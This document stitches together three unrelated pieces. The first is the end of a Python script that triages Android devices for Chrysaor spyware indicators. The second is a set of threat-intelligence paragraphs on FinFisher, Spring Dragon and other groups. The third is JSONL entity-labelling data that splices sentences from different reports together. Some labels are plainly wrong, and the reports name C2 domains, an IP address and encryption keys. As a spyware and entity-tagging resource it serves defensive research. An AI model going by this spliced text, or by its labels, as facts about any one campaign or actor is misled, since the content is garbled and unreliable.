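    ("com.network.android", "5353212b70aa096d918e4eb6b49eb5ad8f59d9bec02d089e88802c01e707c3a1", "44f6d1caa257799e57f0ecaf4e2e216178f4cb3d"),
    ("com.binary.sms.receiver", "9fae5d148b89001555132c896879652fe1ca633d35271db34622248e048c78ae", "7771af1ad3a3d9c0b4d9b55260bb47c2692722cf"),
    ("com.android.copy", "e384694d3d17cd88ec3a66c740c6398e07b8ee401320ca61e26bdf96c20485b4", "7771af1ad3a3d9c0b4d9b55260bb47c2692722cf"),
    ("com.android.copy", "12e085ab85db887438655feebd249127d813e31df766f8c7b009f9519916e389", "7771af1ad3a3d9c0b4d9b55260bb47c2692722cf"),
    ("com.android.copy", "6348104f8ef22eba5ac8ee737b192887629de987badbb1642e347d0dd01420f8", "31a8633c2cd67ae965524d0b2192e9f14d04d016"),
]
KNOWN_SHA256 = {s for _, s, _ in KNOWN_SAMPLES}
KNOWN_CERTS = {c for _, _, c in KNOWN_SAMPLES}
KNOWN_PACKAGES = {p for p, _, _ in KNOWN_SAMPLES}

SUPERUSER_BINARY = "/system/csk"           # pre-positioned su binary
ANTIDOTE_FILE = "/sdcard/MemosForNotes"     # presence makes the app remove itself
SAMSUNG_UPDATER = "com.sec.android.fotaclient"

PM_LINE = re.compile(r"^package:(?P<path>\S+)=(?P<pkg>[\w.]+)$")


def parse_pm_list(text: str) -> dict:
    """`pm list packages -f` output -> {package: apk_path}."""
    packages = {}
    for line in text.splitlines():
        m = PM_LINE.match(line.strip())
        if m:
            packages[m.group("pkg")] = m.group("path")
    return packages


def triage(pm_output, apk_hashes, auto_update_setting, existing_paths, samsung=True):
    """Return (severity, message) findings. apk_hashes: apk_path -> (sha256, cert_sha1)."""
    findings = []
    packages = parse_pm_list(pm_output)
    for pkg, path in packages.items():
        sha256, cert = apk_hashes.get(path, ("", ""))
        if sha256.lower() in KNOWN_SHA256:
            findings.append(("critical", "%s at %s matches a known Chrysaor sample" % (pkg, path)))
        elif cert.lower() in KNOWN_CERTS:
            # certificate pivot: same signer, unknown APK -> possible new variant
            findings.append(("high", "%s at %s is signed with a known Chrysaor certificate" % (pkg, path)))
        elif pkg in KNOWN_PACKAGES:
            findings.append(("medium", "%s reuses a Chrysaor package name" % pkg))
        if pkg in KNOWN_PACKAGES and path.startswith("/system/"):
            findings.append(("high", "%s installed on /system: survives factory reset" % pkg))
    if samsung and SAMSUNG_UPDATER not in packages:
        findings.append(("high", "%s missing: system update app removed" % SAMSUNG_UPDATER))
    if str(auto_update_setting).strip() == "0":
        findings.append(("medium", "SOFTWARE_UPDATE_AUTO_UPDATE is 0: auto-updates disabled"))
    if SUPERUSER_BINARY in existing_paths:
        findings.append(("high", "%s present: pre-positioned superuser binary" % SUPERUSER_BINARY))
    if ANTIDOTE_FILE in existing_paths:
        findings.append(("info", "%s present: Chrysaor removes itself when it sees this file" % ANTIDOTE_FILE))
    return findings


# Constructed inventory: one known sample on /system, one benign app with placeholder
# hashes, one unknown APK signed with a Chrysaor certificate.
SAMPLE_PM = """package:/system/app/NetworkAndroid/NetworkAndroid.apk=com.network.android
package:/data/app/com.whatsapp-1/base.apk=com.whatsapp
package:/data/app/com.android.copy-1/base.apk=com.android.copy
"""
SAMPLE_HASHES = {
    "/system/app/NetworkAndroid/NetworkAndroid.apk": ("98ca5f94638768e7b58889bb5df4584bf5b6af56b188da48c10a02648791b30c", "516f8f516cc0fd8db53785a48c0a86554f75c3ba"),
    "/data/app/com.whatsapp-1/base.apk": ("0" * 64, "0" * 40),
    "/data/app/com.android.copy-1/base.apk": ("f" * 64, "7771af1ad3a3d9c0b4d9b55260bb47c2692722cf"),
}


def demo():
    """Run the triage over the constructed inventory (auto-update off, /system/csk present)."""
    return triage(SAMPLE_PM, SAMPLE_HASHES, "0", {"/system/csk"})


if __name__ == "__main__":
    for severity, message in demo():
        print(severity.upper(), message)
```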
Analysis of the operational times of the group's activities indicates that it is probably centered around China Standard Time (UTC+8). APT40 relies heavily on web shells for an initial foothold into an organization. Depending on placement, a web shell can provide continued access to victims' environments, re-infect victim systems, and facilitate lateral movement. APT40 has been observed leveraging a variety of techniques for initial compromise, including web server exploitation, phishing campaigns delivering publicly available and custom backdoors, and strategic web compromises.

This threat actor is remarkable for two reasons:
• Its access to sophisticated zero-day exploits for Microsoft and Adobe software
• Its use of an advanced piece of government-grade surveillance spyware, FinFisher, also known as FinSpy and detected by Microsoft security products as Wingbird
FinFisher is such a complex piece of malware that, like other researchers, we had to devise special methods to crack it. We needed to do this to understand the techniques FinFisher uses to compromise and persist on a machine, and to validate the effectiveness of the Office 365 ATP detonation sandbox, Windows Defender Advanced Threat Protection (Windows Defender ATP) generic detections, and other Microsoft security solutions. This task proved to be nontrivial. FinFisher is not afraid of using all kinds of tricks, ranging from junk instructions and "spaghetti code" to multiple layers of virtual machines and several known and lesser-known anti-debug and defensive measures. Security analysts are typically equipped with the tools to defeat a good number of similar tricks during malware investigations. However, FinFisher is in a different category of malware for the level of its anti-analysis protection. It's a complicated puzzle that can be solved by skilled reverse engineers only with a good amount of time, code, automation, and creativity. The intricate anti-analysis methods reveal how much effort the FinFisher authors exerted to keep the malware hidden and difficult to analyze.

The group's capabilities are more than the much discussed CVE-2012-0158 exploits over the past few years. A paper released today by our colleagues at Palo Alto Networks presented a portion of data on this crew under the label "the Lotus Blossom Operation", likely named for the debug string present in much of the "Elise" codebase since at least 2012: "d:\lstudio\projects\lotus\…". Instead, the Spring Dragon group is known to have employed spearphish exploits, strategic web compromises, and watering hole attacks. The group's spearphish toolset includes PDF exploits, Adobe Flash Player exploits, and the common CVE-2012-0158 Word exploits, including those generated from the infamous "Tran Duy Linh" kit. The Spring Dragon appears to have rolled out a steady mix of exploits against government-related organizations in VN, TW, PH, and other locations over the past few years.

As outlined in recent research detailing the GRU's disruptive playbook, we have observed Sandworm adopting LotL tactics across its wider operations to similarly increase the speed and scale at which it can operate while minimizing the odds of detection. This indicates that the threat actor is likely capable of quickly developing similar capabilities against other OT systems from different original equipment manufacturers (OEMs) leveraged across the world.

In each case, CrowdStrike reviewed the relevant logs and determined there was no evidence of exploitation of CVE-2022-41040 for initial access.

• Cisco Talos has discovered a threat actor conducting several campaigns against government entities, military organizations and civilian users in Ukraine and Poland.

In an article for DarkReading, Ericka Chickowski highlights 15 key indicators of compromise. In the listed indicators of compromise, we noticed domains that we had seen used in a distinct skimming campaign which didn't seem to be documented yet. We found roughly 500 domain names that lead or have led to the "Pig network" between 2015 and March 2017. All companies are subject to these.

A bot identifier is generated from the machine's MAC address. The backdoor reports information about the machine such as the user name, computer name, Windows version and system language to the C&C server and awaits commands. The data is XOR encrypted with the key "*&b0i0rong2Y7un1" and base64-encoded. The data received from the C&C server is encrypted using the same key. This simple backdoor has only four commands that can be used by the attacker:
• DownUrlFile
• DownRunUrlFile
• RunUrlBinInMem
• UnInstall
The commands are pretty much self-explanatory. They allow the attacker to run additional executables from a given URL. The last one is perhaps less obvious.
Although COSMICENERGY does not directly overlap with any previously observed malware families , its capabilities are comparable to those employed in previous incidents and malware .", "spans": [{"start": 63, "end": 72, "label": "Malware"}, {"start": 147, "end": 160, "label": "Organization"}, {"start": 221, "end": 253, "label": "Organization"}, {"start": 366, "end": 378, "label": "Malware"}, {"start": 434, "end": 441, "label": "Malware"}, {"start": 529, "end": 536, "label": "Malware"}]} {"text": "This exercise revealed tons of information about techniques used by FinFisher that we used to make Office 365 ATP more resistant to sandbox detection and Windows Defender ATP to catch similar techniques and generic behaviors . Organizations located in Myanmar and targeted by Spring Dragon have gone unmentioned . The UnInstall command doesn\u2019t remove the malware from the system . While many statesponsored threat actors engage in spear phishing , ransomware is the preferred weapon of these cybercriminals .", "spans": [{"start": 68, "end": 77, "label": "Malware"}, {"start": 99, "end": 113, "label": "System"}, {"start": 154, "end": 174, "label": "System"}, {"start": 276, "end": 289, "label": "Organization"}, {"start": 392, "end": 420, "label": "Organization"}, {"start": 492, "end": 506, "label": "Organization"}]} {"text": "Using intelligence from our in-depth investigation , Windows Defender ATP can raise alerts for malicious behavior employed by FinFisher ( such as memory injection in persistence ) in different stages of the attack kill chain . Spring Dragon 's infiltration techniques there were not simply spearphish . After all , it is embedded inside a legitimate executable that still needs to run . 
In late 2021 and 2022 , Cuba ransomware delivered an increasing number of highprofile attacks .", "spans": [{"start": 53, "end": 73, "label": "System"}, {"start": 126, "end": 135, "label": "Malware"}, {"start": 227, "end": 240, "label": "Organization"}, {"start": 411, "end": 426, "label": "Organization"}]} {"text": "Machine learning in Windows Defender ATP further flags suspicious behaviors observed related to the manipulation of legitimate Windows binaries . The download name was \" Zawgyi_Keyboard_L.zip \" , and it dropped a \" setup.exe \" that contained several backdoor components , including an Elise \" wincex.dll \" ( a42c966e26f3577534d03248551232f3 , detected as Backdoor.Win32.Agent.delp ) . Rather than removing anything , it disables the malicious code by setting the following registry value to 1: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ImageFlag . \u201c Who or what is asdfdfsda@asdf.com ? , \u201d Biderman asked , after being sent a list of nine email addresses .", "spans": [{"start": 20, "end": 40, "label": "System"}, {"start": 127, "end": 134, "label": "System"}, {"start": 170, "end": 191, "label": "Malware"}, {"start": 215, "end": 224, "label": "Malware"}, {"start": 285, "end": 290, "label": "System"}, {"start": 293, "end": 303, "label": "Malware"}, {"start": 570, "end": 588, "label": "Organization"}, {"start": 595, "end": 603, "label": "Organization"}]} {"text": "Figure 1 . While this particular actor effectively used their almost worn out CVE-2012-0158 exploits in the past , Spring Dragon employs more involved and creative intrusive activity as well . When the payload is started , the registry value is queried and execution is aborted if set . 
Instead of compiling a list of threats , this technique looks at what is already on a computer and identifies programs as safe , blocking software that does nt match .", "spans": [{"start": 33, "end": 38, "label": "Organization"}, {"start": 78, "end": 91, "label": "Vulnerability"}, {"start": 115, "end": 128, "label": "Organization"}]} {"text": "Generic Windows Defender ATP detections trigger alerts on FinFisher behavior While our analysis has allowed us to immediately protect our customers , we \u2019 d like to share our insights and add to the growing number of published analyses by other talented researchers ( listed below this blog post ) . The well-known threat group called DRAGONFISH or Lotus Blossom are distributing a new form of Elise malware targeting organizations for espionage purposes . Perhaps the attackers are trying to reduce the load from their C&C servers by avoiding callbacks from uninteresting victims . The domain name was created on the same day the ad appeared and the website is a copy of the real one .", "spans": [{"start": 8, "end": 28, "label": "System"}, {"start": 58, "end": 67, "label": "Malware"}, {"start": 315, "end": 327, "label": "Organization"}, {"start": 335, "end": 345, "label": "Organization"}, {"start": 349, "end": 362, "label": "Organization"}, {"start": 394, "end": 407, "label": "System"}, {"start": 436, "end": 445, "label": "Organization"}, {"start": 583, "end": 686, "label": "Malware"}]} {"text": "We hope that this blog post helps other researchers to understand and analyze FinFisher samples and that this industry-wide information-sharing translate to the protection of as many customers as possible . The threat actors associated with DRAGONFISH have previously focused their campaigns on targets in Southeast Asia , specifically those located in countries near the South China Sea . Based on ESET telemetry , one of the second stage payload delivered to victims is Win64/Winnti.BN . 
Its capabilities include retrieving and executing additional payloads , collecting basic system information , and executing shell commands .", "spans": [{"start": 78, "end": 87, "label": "Malware"}, {"start": 211, "end": 224, "label": "Organization"}, {"start": 241, "end": 251, "label": "Organization"}, {"start": 399, "end": 403, "label": "Organization"}, {"start": 472, "end": 487, "label": "Indicator"}]} {"text": "Spaghetti and junk codes make common analyst tools ineffective In analyzing FinFisher , the first obfuscation problem that requires a solution is the removal of junk instructions and \u201c spaghetti code \u201d , which is a technique that aims to confuse disassembly programs . iDefense analysts have identified a campaign likely to be targeting members of\u2014 or those with affiliation or interest in\u2014the ASEAN Defence Ministers ' Meeting ( ADMM ) . As far as we can tell , its dropper was downloaded over HTTPS from api.goallbandungtravel.com . The downloader uses managed AES ( Rijndael algorithm ) to decrypt the appended data which is then reflectively loaded as a byte array using the Assembly .", "spans": [{"start": 76, "end": 85, "label": "Malware"}, {"start": 269, "end": 277, "label": "Organization"}, {"start": 400, "end": 427, "label": "Organization"}, {"start": 430, "end": 434, "label": "Organization"}, {"start": 506, "end": 532, "label": "Indicator"}, {"start": 535, "end": 549, "label": "Malware"}, {"start": 550, "end": 687, "label": "Malware"}]} {"text": "Spaghetti code makes the program flow hard to read by adding continuous code jumps , hence the name . iDefense analysts have identified a campaign likely to be targeting members of or those with affiliation or interest in the ASEAN Defence Minister 's Meeting ( ADMM ) . 
We have seen it installed as a Windows service and as a DLL in C:\\Windows\\System32 using the following file names : The threat actor was consistently observed removing prior payloads from disk ; however , the FSEvents artifacts were able to provide great insight into files that previously existed on disk .", "spans": [{"start": 102, "end": 110, "label": "Organization"}, {"start": 226, "end": 259, "label": "Organization"}, {"start": 262, "end": 266, "label": "Organization"}, {"start": 302, "end": 309, "label": "System"}, {"start": 327, "end": 330, "label": "System"}, {"start": 480, "end": 498, "label": "System"}]} {"text": "An example of FinFisher \u2019 s spaghetti code is shown below . iDefense assesses with high confidence that this campaign is associated with the threat group DRAGONFISH ( also known as Lotus Blossom and Spring Dragon ) . cscsrv.dll dwmsvc.dll iassrv.dll mprsvc.dll nlasrv.dll powfsvc.dll racsvc.dll slcsvc.dll snmpsvc.dll sspisvc.dll . Indicators of compromise act as breadcrumbs that lead infosec and IT pros to detect malicious activity early in the attack sequence .", "spans": [{"start": 14, "end": 23, "label": "Malware"}, {"start": 60, "end": 68, "label": "Organization"}, {"start": 141, "end": 153, "label": "Organization"}, {"start": 154, "end": 164, "label": "Organization"}, {"start": 181, "end": 194, "label": "Organization"}, {"start": 199, "end": 212, "label": "Organization"}, {"start": 217, "end": 227, "label": "Indicator"}, {"start": 228, "end": 238, "label": "Indicator"}, {"start": 239, "end": 249, "label": "Indicator"}, {"start": 250, "end": 260, "label": "Indicator"}, {"start": 261, "end": 271, "label": "Indicator"}, {"start": 272, "end": 283, "label": "Indicator"}, {"start": 284, "end": 294, "label": "Indicator"}, {"start": 295, "end": 305, "label": "Indicator"}, {"start": 306, "end": 317, "label": "Indicator"}, {"start": 318, "end": 329, "label": "Indicator"}, {"start": 332, "end": 356, "label": "Indicator"}]} {"text": "Figure 2 . 
To mitigate the threat of the described campaign , security teams can consider blocking access to the C2 server 103.236.150.14 and , where applicable , ensure that the Microsoft Security Update KB2553204 is installed in order to patch the CVE-2017-11882 vulnerability . The samples we have analyzed were actually quite large , each of them about 60 MB . In terms of detection , organizations should look to align their detection strategy with the MITRE ATTCK Framework to help detect a ransomware attack before its too late .", "spans": [{"start": 250, "end": 264, "label": "Vulnerability"}]} {"text": "The spaghetti code in FinFisher dropper This problem is not novel , and in common situations there are known reversing plugins that may help for this task . The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept ( POC ) code to install a Trojan called Emissary , which is related to the Operation Lotus Blossom campaign . This is , however , only for appearance because the real size or the PE file is between 63 KB and 72 KB , depending on the version . That makes highfidelity threat intelligence and a proactive security stance critically important to success in 2023 .", "spans": [{"start": 22, "end": 31, "label": "Malware"}, {"start": 161, "end": 167, "label": "Organization"}, {"start": 189, "end": 202, "label": "Vulnerability"}, {"start": 301, "end": 309, "label": "System"}]} {"text": "In the case of FinFisher , however , we could not find a good existing interactive disassembler ( IDA ) plugin that can normalize the code flow . The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan . The malware files simply have lots of clean files appended to them . 
To understand the context of a computing interaction between servers , tools , and users , we need to analyze the endtoend process .", "spans": [{"start": 15, "end": 24, "label": "Malware"}, {"start": 168, "end": 178, "label": "Organization"}, {"start": 192, "end": 198, "label": "Organization"}, {"start": 466, "end": 473, "label": "System"}, {"start": 476, "end": 481, "label": "System"}, {"start": 488, "end": 493, "label": "Organization"}]} {"text": "So we decided to write our own plugin code using IDA Python . On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs . This is probably done by the component that drops and installs this malicious service . The Monti ransomware collective has restarted their operations , focusing on institutions in the legal and governmental fields .", "spans": [{"start": 53, "end": 59, "label": "System"}, {"start": 86, "end": 99, "label": "Organization"}, {"start": 134, "end": 144, "label": "Organization"}, {"start": 281, "end": 308, "label": "Organization"}, {"start": 374, "end": 403, "label": "Organization"}]} {"text": "Armed with this code , we removed this first layer of anti-analysis protection . On November 10 , 2015 , Lotus Blossom sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs . Once the service runs , it appends the extension .mui to its DLL path , reads that file and decrypts it using RC5 . In one particular forum post , Hack520 mentions that he was previously jailed for a period of 10 months in a blog post dated May 31 , 2009 .", "spans": [{"start": 105, "end": 118, "label": "Organization"}, {"start": 153, "end": 163, "label": "Organization"}, {"start": 269, "end": 272, "label": "System"}, {"start": 318, "end": 321, "label": "System"}, {"start": 355, "end": 362, "label": "Organization"}]} {"text": "Removing the junk instructions revealed a readable block of code . 
Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . The decrypted MUI file contains position-independent code at offset 0 . This type of vulnerability is known as a server - side request forgery ( SSRF ) .", "spans": [{"start": 88, "end": 112, "label": "Malware"}, {"start": 141, "end": 205, "label": "Vulnerability"}, {"start": 217, "end": 230, "label": "Vulnerability"}, {"start": 346, "end": 384, "label": "Vulnerability"}]} {"text": "This code starts by allocating two chunks of memory : a global 1 MB buffer and one 64 KB buffer per thread . Lotus Blossom attempted to exploit CVE-2014-6332 using the POC code available in the wild . The RC5 key is derived from the hard drive serial number and the string \u201c f@Ukd!rCto R$. \u201d \u2014 we were not able to obtain any MUI files nor the code that installs them in the first place . Malwarebytes customers are shielded against this campaign via our web protection in Endpoint Protection ( EP ) , Endpoint Detection and Response ( EDR ) and Malwarebytes Premium .", "spans": [{"start": 109, "end": 122, "label": "Organization"}, {"start": 144, "end": 157, "label": "Vulnerability"}, {"start": 205, "end": 208, "label": "System"}, {"start": 388, "end": 400, "label": "Organization"}, {"start": 437, "end": 445, "label": "Organization"}]} {"text": "The big first buffer is used as index for multiple concurrent threads . This Trojan is related to the Elise backdoor described in the Operation Lotus Blossom report . Thus , we do not know the exact purpose of this malicious service . 
The log messages recorded in the nslog can include connection statistics for SSLVPN and ICA proxy sessions .", "spans": [{"start": 102, "end": 116, "label": "System"}, {"start": 312, "end": 318, "label": "System"}, {"start": 323, "end": 332, "label": "System"}]} {"text": "A big chunk of data is extracted from the portable executable ( PE ) file itself and decrypted two times using a custom XOR algorithm . Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 . Recent versions of the malware include an \u201c auto-update \u201d mechanism , using C&C server http://checkin.travelsanignacio.com . CrowdStrike Services recently investigated several Play ransomware intrusions where the common entry vector was suspected to be the Microsoft Exchange ProxyNotShell vulnerabilities CVE-2022 - 41040 and CVE-2022 - 41082 .", "spans": [{"start": 136, "end": 149, "label": "Organization"}, {"start": 176, "end": 189, "label": "Vulnerability"}, {"start": 222, "end": 237, "label": "System"}, {"start": 354, "end": 389, "label": "Indicator"}, {"start": 392, "end": 412, "label": "Organization"}, {"start": 443, "end": 469, "label": "Organization"}, {"start": 524, "end": 556, "label": "Vulnerability"}, {"start": 573, "end": 589, "label": "Vulnerability"}, {"start": 594, "end": 610, "label": "Vulnerability"}]} {"text": "We determined that this chunk of data contains an array of opcode instructions ready to be interpreted by a custom virtual machine program ( from this point on referenced generically as \u201c VM \u201d ) implemented by FinFisher authors . APT threat actors , most likely nation state-sponsored , targeted a diplomat in the French Ministry of Foreign Affairs with a seemingly legitimate invitation to a technology conference in Taiwan . That C&C server served the latest version of the MUI files encrypted with a static RC5 key . 
A recent report from the United Kingdom \u2019s National CyberSecurity Center ( NCSC ) highlights how the accessibility of these tools \u201c lowers the barrier to entry to state and non - state actors in obtaining capability and intelligence . \u201d", "spans": [{"start": 210, "end": 219, "label": "Malware"}, {"start": 230, "end": 247, "label": "Organization"}, {"start": 298, "end": 306, "label": "Organization"}, {"start": 510, "end": 513, "label": "System"}, {"start": 545, "end": 601, "label": "Organization"}]} {"text": "Figure 3 . Additionally , the targeting of a French diplomat based in Taipei , Taiwan aligns with previous targeting by these actors , as does the separate infrastructure . The C&C server was not responding during our analysis . A typical web request to the frontend to exploit the SSRF vulnerability on CVE-2022 - 41040 involves some variation of path confusion that references the endpoint as shown below : The backend request for a typical ProxyNotShell exploitation is shown below : Once the PowerShell remoting service can be reached , the second step involves vulnerability CVE-2022 - 41082 being exploited in order to execute arbitrary commands .", "spans": [{"start": 45, "end": 60, "label": "Organization"}, {"start": 126, "end": 132, "label": "Organization"}, {"start": 282, "end": 300, "label": "Vulnerability"}, {"start": 304, "end": 320, "label": "Vulnerability"}, {"start": 443, "end": 456, "label": "Vulnerability"}, {"start": 496, "end": 523, "label": "Vulnerability"}, {"start": 580, "end": 596, "label": "Vulnerability"}]} {"text": "The stages of the FinFisher multi-layered protection mechanisms Stage 0 : Dropper with custom virtual machine The main dropper implements the VM dispatcher loop and can use 32 different opcodes handlers . The Elise malware used by Lotus Blossom , which was an attack campaign on targets in Southeast Asia . Let\u2019s start with who is not targeted . 
Because the cdhash is computed based on executable code in the application , Mandiant was able to identify additional malware in the environment despite the files being deleted by the threat actor and the samples having different file hashes .", "spans": [{"start": 18, "end": 27, "label": "Malware"}, {"start": 209, "end": 222, "label": "System"}, {"start": 231, "end": 244, "label": "Organization"}, {"start": 354, "end": 420, "label": "Malware"}, {"start": 423, "end": 431, "label": "Organization"}]} {"text": "Th 64KB buffer is used as a VM descriptor data structure to store data and the just-in-time ( JIT ) generated code to run . Based on the targeting and lures , Unit 42 assesses that the Lotus Blossom actors ' collection requirements include militaries and government agencies in Southeast Asia . Early in the payload , the malware checks to see if the system language is Russian or Chinese . e.g. , uses character as a separator and that contains valid IP list uses as a separator .", "spans": [{"start": 159, "end": 166, "label": "Organization"}, {"start": 185, "end": 205, "label": "Organization"}, {"start": 240, "end": 250, "label": "Organization"}, {"start": 255, "end": 274, "label": "Organization"}, {"start": 398, "end": 479, "label": "Malware"}]} {"text": "The VM dispatcher loop routine ends with a JMP to another routine . In December 2015 , Unit 42 published a blog about a cyber espionage attack using the Emissary Trojan as a payload . In either case , the malware stops running . 
Among the group \u2019s most interesting characteristics are : \u2022 Strong functional and structural similarities linking its malware toolset to early MiniDuke and more recent CosmicDuke and OnionDuke components In early 2013 , GReAT observed several incidents that were so unusual they suggested the existence of a new , previously unknown threat actor .", "spans": [{"start": 87, "end": 94, "label": "Organization"}, {"start": 153, "end": 168, "label": "System"}, {"start": 372, "end": 380, "label": "Malware"}, {"start": 397, "end": 407, "label": "Malware"}, {"start": 412, "end": 421, "label": "Malware"}, {"start": 449, "end": 454, "label": "Organization"}]} {"text": "In total , there are 32 different routines , each of them implementing a different opcode and some basic functionality that the malware program may execute . The oldest sample we found was created in 2009 , indicating this tool has been in use for almost seven years . There is no way around this : the attackers are simply not interested in computers configured with those languages . The malware uses stack strings followed by a single bitwise operation .", "spans": [{"start": 386, "end": 397, "label": "Malware"}, {"start": 398, "end": 455, "label": "Malware"}]} {"text": "Figure 4 . In addition , Emissary appears to against Taiwan or Hong Kong , all of the decoys are written in Traditional Chinese , and they use themes related to the government or military . ESET telemetry shows victims are mostly located in Asia , with Thailand having the largest part of the pie . 
Depending on the platform and on how the code is compiled , these vulnerabilities could lead to arbitrary code execution : Talos is disclosing these vulnerabilities despite no official fix from Open Babel .", "spans": [{"start": 25, "end": 33, "label": "System"}, {"start": 165, "end": 175, "label": "Organization"}, {"start": 179, "end": 187, "label": "Organization"}, {"start": 190, "end": 194, "label": "Organization"}, {"start": 422, "end": 427, "label": "Organization"}, {"start": 493, "end": 503, "label": "Organization"}]} {"text": "A snapshot of the code that processes each VM opcode and the associate interpreter The presence of a VM and virtualized instruction blocks can be described in simpler terms : Essentially , the creators of FinFisher interposed a layer of dynamic code translation ( the virtual machine ) that makes analysis using regular tools practically impossible . Of note , this is three years earlier than the oldest Elise sample we have found , suggesting this group has been active longer than previously documented . Given the popularity of the compromised application that is still being distributed by its developer , it wouldn\u2019t be surprising if the number of victims is in the tens or hundreds of thousands . There are also many examples of nation - state actors leveraging contractors to develop offensive capabilities , as shown most recently in contracts between Russia \u2019s Ministry of Defense and NTC Vulkan .", "spans": [{"start": 2, "end": 10, "label": "Malware"}, {"start": 205, "end": 214, "label": "Malware"}, {"start": 405, "end": 417, "label": "System"}, {"start": 450, "end": 455, "label": "Organization"}, {"start": 736, "end": 757, "label": "Organization"}, {"start": 861, "end": 890, "label": "Organization"}, {"start": 895, "end": 905, "label": "Organization"}]} {"text": "Static analysis tools like IDA may not be useful in analyzing custom code that is interpreted and executed through a VM and a new set of instructions . 
In addition , we observed a TTP shift post publication with regards to their malware delivery ; they started using compromised but legitimate domains to serve their malware . Supply-chain attacks are hard to detect from the consumer perspective . Several issues in Foxit PDF reader could lead to arbitrary code execution Foxit PDF Reader is one of the most popular PDF readers on the market , offering many similar features to Adobe Acrobat .", "spans": [{"start": 283, "end": 301, "label": "System"}, {"start": 417, "end": 433, "label": "System"}, {"start": 473, "end": 489, "label": "System"}, {"start": 579, "end": 592, "label": "System"}]} {"text": "On the other hand , dynamic analysis tools ( like debuggers or sandbox ) face the anti-debug and anti-analysis tricks hidden in the virtualized code itself that detects sandbox environments and alters the behavior of the malware . All of the Emissary we've collected are written in Traditional Chinese , which is used primarily in Taiwan and Hong Kong . It is impossible to start analyzing every piece of software we run , especially with all the regular updates we are encouraged or required to install . TIEDYE can communicate with a C2 server using a range of supported protocols described as follows .", "spans": [{"start": 242, "end": 250, "label": "System"}, {"start": 536, "end": 545, "label": "System"}]} {"text": "At this stage , the analysis can only continue by manually investigating the individual code blocks and opcode handlers , which are highly obfuscated ( also using spaghetti code ) . One of the most interesting observations made during this analysis is that the amount of development effort devoted to Emissary significantly increased after we published our Operation Lotus Blossom report in June 2015 , resulting in many new versions of the Emissary Trojan . So , we put our trust in software vendors that the files they distribute don\u2019t include malware . 
CrowdStrike researchers replicated the exploit method attack on Exchange systems that had not received the November 8 , 2022 patch KB5019758 , but could not replicate the attack on systems that had received that patch .", "spans": [{"start": 301, "end": 309, "label": "System"}, {"start": 441, "end": 456, "label": "System"}, {"start": 556, "end": 579, "label": "Organization"}, {"start": 620, "end": 636, "label": "Organization"}]} {"text": "Reusing our deobfuscation tool and some other tricks , we have been able to reverse and analyze these opcodes and map them to a finite list that can be used later to automate the analysis process with some scripting . Lotus Blossom targeted the government , higher education , and high tech companies . Perhaps that\u2019s the reason multiple groups target software developers : compromising the vendor results in a botnet as popular as the software that is hacked . But on Mar. 5 , 2014 , Harrison committed suicide by shooting himself in the head with a handgun .", "spans": [{"start": 218, "end": 231, "label": "Organization"}, {"start": 245, "end": 255, "label": "Organization"}, {"start": 258, "end": 274, "label": "Organization"}, {"start": 281, "end": 300, "label": "Organization"}, {"start": 485, "end": 493, "label": "Organization"}]} {"text": "The opcode instructions generated by this custom VM are divided into different categories : Logical opcodes , which implement bit-logic operators ( OR , AND , NOT , XOR ) and mathematical operators Conditional branching opcodes , which implement a code branch based on conditions ( equals to JC , JE , JZ , other similar branching opcodes ) Load/Store opcodes , which write to or read from particular addresses of the virtual address space of the process Specialized opcodes for various purposes , Our evidence suggests that malware authors created Emissary as early as 2009 , which suggests that threat actors have relied on this tool as a payload in cyber-espionage attacks for many years . 
However , there is a downside of using such a technique : once the scheme is uncovered , the attacker loses control and computers can be cleaned through regular updates . What \u2019s more , two other vulnerabilities in MOVEit were found while new victims were still coming forward .", "spans": [{"start": 549, "end": 557, "label": "System"}, {"start": 597, "end": 610, "label": "Organization"}, {"start": 908, "end": 914, "label": "System"}]} {"text": "like execute specialized machine instruction that are not virtualized We are publishing below the ( hopefully ) complete list of opcodes used by FinFisher VM that we found during our analysis and integrated into our de-virtualization script : INDEX MNEMONIC DESCRIPTION 0x0 EXEC Execute machine code 0x1 JG Jump if greater/Jump if not less or equal 0x2 WRITE Write a value into the dereferenced internal VM value ( treated as a pointer ) 0x3 JNO Jump if not overflow 0x4 JLE Jump While it lacks more advanced functionality like screen capturing , it is still able to carry out most tasks desired by threat actors : exfiltration of files , ability to download and execute additional payloads , and gain remote shell access . We do not know the motives of the attackers at this point . 
3AM is written in Rust and appears to be a completely new malware family .", "spans": [{"start": 145, "end": 154, "label": "Malware"}, {"start": 599, "end": 612, "label": "Organization"}, {"start": 615, "end": 636, "label": "Malware"}, {"start": 650, "end": 658, "label": "Malware"}, {"start": 663, "end": 690, "label": "Malware"}, {"start": 697, "end": 721, "label": "Malware"}, {"start": 784, "end": 787, "label": "Malware"}, {"start": 802, "end": 806, "label": "System"}]} {"text": "if less or equal ( signed ) 0x5 MOV Move the value of a register into the VM descriptor ( same as opcode 0x1F ) 0x6 JO Jump if overflow 0x7 PUSH Push the internal VM value to the stack 0x8 ZERO Reset the internal VM value to 0 ( zero ) 0x9 JP Jump if parity even 0xA WRITE Write into an address 0xB ADD Add the value of a register to the internal VM value 0xC JNS Jump if not signed 0xD JL Jump if less ( signed ) 0xE The timeline in Figure 2 shows that the Emissary Trojan was first created ( version 1.0 ) in May 2009 and quickly received an update that resulted in version 1.1 in June 2009 . Is it simply financial gain? Are there any reasons why the three affected products are from Asian developers and for the Asian market? Do these attackers use a botnet as part of a larger espionage operation? ESET products detect this threat as Win32/HackedApp.Winnti.A , Win32/HackedApp.Winnti.B , the payload as Win32/Winnti.AG , and the second stage as Win64/Winnti.BN . The United States government also threatened to step in when it looked like a U.S. 
